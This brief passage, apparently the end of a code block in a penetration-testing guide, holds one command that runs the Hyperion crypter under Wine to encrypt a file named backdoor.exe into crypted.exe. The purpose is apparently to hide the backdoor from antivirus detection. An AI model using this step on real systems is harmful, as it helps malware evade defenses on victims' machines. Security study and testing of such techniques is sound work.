    wine hyperion.exe ../backdoor.exe ../crypted.exe
    ```
--------------------------------------------------------------------------------